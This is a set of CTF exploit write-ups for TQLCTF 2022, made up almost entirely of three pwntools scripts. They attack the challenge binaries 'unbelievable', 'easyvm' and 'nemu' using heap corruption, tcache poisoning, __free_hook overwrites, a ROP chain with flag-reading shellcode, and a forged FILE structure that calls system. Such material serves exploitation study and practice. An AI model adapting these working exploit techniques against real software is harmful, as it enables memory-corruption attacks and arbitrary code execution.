TQLCTF 2022 partial writeups

#!/usr/bin/python3
# -*- coding:utf-8 -*-

from pwn import *
import os, struct, random, time, sys, signal

context.arch = 'amd64'
sh = process('./unbelievable')

def c1(size, content):
    sh.sendlineafter(b'> ', b'1')
    sh.sendline(str(size).encode())
    sh.sendline(content)

def c2(size):
    sh.sendlineafter(b'> ', b'2')
    sh.sendline(str(size).encode())

def c3():
    sh.sendlineafter(b'> ', b'3')

c2(-0x290)

c1(0x280, b'\0\0' * 8 + p16(1) + p16(1) + b'\0\0' * 54 + p64(0) * 8 + p64(0x404018) + p64(0x404080))


c1(0x90, p64(0x4010f0) + p64(0x0000000000401040))
c1(0xa0, p64(0))

c3()

sh.interactive()

#!/usr/bin/python3
# -*- coding:utf-8 -*-

from pwn import *
import os, struct, random, time, sys, signal

context.arch = 'amd64'
sh = process('./easyvm')

payload = asm('''

sub rsp, 0x800
mov r13, rsp
mov r14, rsp
add r14, 0x400


;// write(STDOUT_FILENO, malloc(0x40), 0x18); -> fd 3
;// malloc(0x40) comes from unsortbin at this time.

;// "$ "
push 0x2024
mov edi, 1
mov rsi, rsp
mov edx, 2
mov eax, 1
syscall
pop rax

mov edi, 0
mov rsi, r13
mov edx, 0x100
mov eax, 0
syscall

mov rdi, r13
mov esi, 0x40
mov eax, 2
syscall

mov edi, 3
mov rsi, r13
mov edx, 0x18
mov eax, 0
syscall

mov edi, 1
mov rsi, r13
mov edx, 0x18
mov eax, 1
syscall


;// malloc(0x40); -> fd 4

;// "$ "
push 0x2024
mov edi, 1
mov rsi, rsp
mov edx, 2
mov eax, 1
syscall
pop rax

mov edi, 0
mov rsi, r13
mov edx, 24
mov eax, 0
syscall

mov rdi, r13
mov esi, 0x40
mov eax, 2
syscall


;// malloc(0x40); -> fd 5

;// "$ "
push 0x2024
mov edi, 1
mov rsi, rsp
mov edx, 2
mov eax, 1
syscall
pop rax

mov edi, 0
mov rsi, r13
mov edx, 24
mov eax, 0
syscall

mov rdi, r13
mov esi, 0x40
mov eax, 2
syscall


;// malloc(0xf0); -> fd 6

;// "$ "
push 0x2024
mov edi, 1
mov rsi, rsp
mov edx, 2
mov eax, 1
syscall
pop rax

mov edi, 0
mov rsi, r13
mov edx, 24
mov eax, 0
syscall

mov rdi, r13
mov esi, 0xf0
mov eax, 2
syscall


;// close(fd 4);
;// close(fd 5);

mov edi, 4
mov eax, 3
syscall

mov edi, 5
mov eax, 3
syscall


;// read(STDIN_FILENO, fd 6, 0x38);
;// Here it will tamper with tcache_entry->next which size is 0x40.

;// "$ "
push 0x2024
mov edi, 1
mov rsi, rsp
mov edx, 2
mov eax, 1
syscall
pop rax

mov edi, 0
mov rsi, r13
mov edx, 0x38
mov eax, 0
syscall

mov edi, 6
mov rsi, r13
mov edx, 0x38
mov eax, 1
syscall


;// malloc(0x40); -> fd 4

;// "$ "
push 0x2024
mov edi, 1
mov rsi, rsp
mov edx, 2
mov eax, 1
syscall
pop rax

mov edi, 0
mov rsi, r13
mov edx, 24
mov eax, 0
syscall

mov rdi, r13
mov esi, 0x40
mov eax, 2
syscall


;// malloc(0x40); -> fd 5
;// Get __free_hook address.

;// "$ "
push 0x2024
mov edi, 1
mov rsi, rsp
mov edx, 2
mov eax, 1
syscall
pop rax

mov edi, 0
mov rsi, r13
mov edx, 24
mov eax, 0
syscall

mov rdi, r13
mov esi, 0x40
mov eax, 2
syscall


;// read(STDIN_FILENO, fd 5, 8);
;// Change __free_hook into printf

;// "$ "
push 0x2024
mov edi, 1
mov rsi, rsp
mov edx, 2
mov eax, 1
syscall
pop rax

mov edi, 0
mov rsi, r13
mov edx, 8
mov eax, 0
syscall

mov edi, 5
mov rsi, r13
mov edx, 8
mov eax, 1
syscall


;// printf("%246$p#");

;// "%246$p#"
mov rax, 0x23702436343225
push rax
mov edi, 1
mov rsi, rsp
mov edx, 7
mov eax, 1
syscall
pop rax


;// Change __free_hook into gets

mov rax, 0x21ce0
add [r13], rax

mov edi, 5
mov rsi, r13
mov edx, 8
mov eax, 1
syscall


;// Prepare for SROP

mov rdi, r13
mov esi, 0xc0
mov eax, 2
syscall

mov edi, 7
mov eax, 3
syscall


;// Change __free_hook into ret

mov rax, 0x61477
sub [r13], rax

mov edi, 5
mov rsi, r13
mov edx, 8
mov eax, 1
syscall


;// Change __free_hook into setcontext as gets() happens.

;// "$ "
push 0x2024
mov edi, 1
mov rsi, rsp
mov edx, 2
mov eax, 1
syscall
pop rax

mov edi, 0
mov rsi, r14
mov edx, 0x3e1
mov eax, 0
syscall

mov rdi, r13
mov esi, 0x300
mov eax, 2
syscall

mov rax, 0x61477
sub [r13], rax

mov rdi, r13
mov esi, 0x300
mov eax, 2
syscall

;// "$ "
push 0x2024
mov edi, 1
mov rsi, rsp
mov edx, 2
mov eax, 1
syscall
pop rax

mov edi, 8
mov rsi, r14
mov edx, 0x300
mov eax, 1
syscall


hlt

''')

sh.sendlineafter(b'Send your code:\n', payload)

sh.sendafter(b'$ ', b'/dev/tttt\0')

result = u64(sh.recvn(8)) 
libc_addr = result - 0x1ec1f0
success('libc_addr: ' + hex(libc_addr))

sh.recvn(8)
result = u64(sh.recvn(8)) 
heap_addr = result - 0x31b20
success('heap_addr: ' + hex(heap_addr))

sh.sendafter(b'$ ', b'/dev/1\0')
sh.sendafter(b'$ ', b'/dev/2\0')

sh.sendafter(b'$ ', b'a' * 24)
# __free_hook
sh.sendafter(b'$ ', b'b' * 0x28 + p64(0x51) + p64(libc_addr + 0x1eeb28))

sh.sendafter(b'$ ', b'/dev/3\0')
sh.sendafter(b'$ ', b'/dev/4\0')

# printf
sh.sendafter(b'$ ', p64(libc_addr + 0x64e10))

sh.recvuntil(b'0x')
result = int(sh.recvuntil(b'#', drop=True), 16)
stack_addr = result 
success('stack_addr: ' + hex(stack_addr))

sh.send(b'\n\n\n')
sh.sendline(b'\0' * 0xd0 + p64(stack_addr-0xf0))
sh.send(b'\n')

layout = [
    libc_addr + 0x0000000000026b72, #: pop rdi; ret; 
    stack_addr & (~0xfff),
    libc_addr + 0x0000000000027529, #: pop rsi; ret; 
    0x2000,
    libc_addr + 0x0000000000162866, #: pop rdx; pop rbx; ret; 
    7, 0,
    libc_addr + 0x000000000004a550, #: pop rax; ret; 
    0xfffffffffffffffa,
    libc_addr + 0x000000000013e47a, #: add eax, 0x10; ret; 
    libc_addr + 0x0000000000066229, #: syscall; ret; 
    stack_addr - 0x90,
]

shellcode = asm('''
    mov eax, 0x67616c66 ;// flag
    push rax

    mov rdi, rsp
    xor eax, eax
    mov esi, eax
    mov al, 2
    syscall ;// open

    push rax
    mov rsi, rsp
    xor eax, eax
    mov edx, eax
    inc eax
    mov edi, eax
    mov dl, 8
    syscall ;// write open() return value

    pop rax
    test rax, rax
    js over

    mov edi, eax
    mov rsi, rsp
    mov edx, 0x01010201
    sub edx, 0x01010101
    xor eax, eax
    syscall ;// read

    mov edx, eax
    mov rsi, rsp
    xor eax, eax
    inc eax
    mov edi, eax
    syscall ;// write

over:
    xor edi, edi
    mov eax, 0x010101e8
    sub eax, 0x01010101
    syscall ;// exit
''')
sh.sendafter(b'$ ', flat(layout) + shellcode)

sh.interactive()
    

#!/usr/bin/python3
# -*- coding:utf-8 -*-

from pwn import *
import os, struct, random, time, sys, signal, math

context.arch = 'i386'
sh = process('./nemu')

def set_mem(addr, value):
    sh.sendlineafter(b'(nemu) ', b'set ' + str(addr).encode() + b' ' + str(value).encode())

sh.sendlineafter(b'(nemu) ', b'si')
sh.sendlineafter(b'(nemu) ', b'x 0x8000040')
sh.recvuntil(b'0x')
sh.recvuntil(b'0x')
sh.recvuntil(b'0x')
heap_addr = int(sh.recvline(), 16) - 0x530
success('heap_addr: ' + hex(heap_addr))

sh.sendlineafter(b'(nemu) ', b'x ' + hex(heap_addr + 0x908 - 0x6a3b80).encode())
sh.recvuntil(b'0x')
sh.recvuntil(b'0x')
sh.recvuntil(b'0x')
libc_addr = int(sh.recvline(), 16)
sh.sendlineafter(b'(nemu) ', b'x ' + hex(heap_addr + 0x90c - 0x6a3b80).encode())
sh.recvuntil(b'0x')
sh.recvuntil(b'0x')
sh.recvuntil(b'0x')
libc_addr = int(sh.recvline(), 16) * 0x100000000 + libc_addr - 0x3c4ce8
success('libc_addr: ' + hex(libc_addr))


set_mem(0, 0xfbad2a84 | 0x1000)
set_mem(4, 0x68733b)
set_mem(0x70, 1)
set_mem(0x88, 0x6a3b80+0x1000)
set_mem(0xd8, 0x6a3b80+0x2000)
system = libc_addr + 0x453a0
success('system: ' + hex(system))
set_mem(0x2000 + 0x38, system % 0x100000000)
set_mem(0x2000 + 0x3c, system // 0x100000000)

set_mem(0x86A3B98 - 0x6a3b80, 0x6a3b80)
sh.sendlineafter(b'(nemu) ', b'si')
sh.recvuntil(b'not found')

sh.interactive()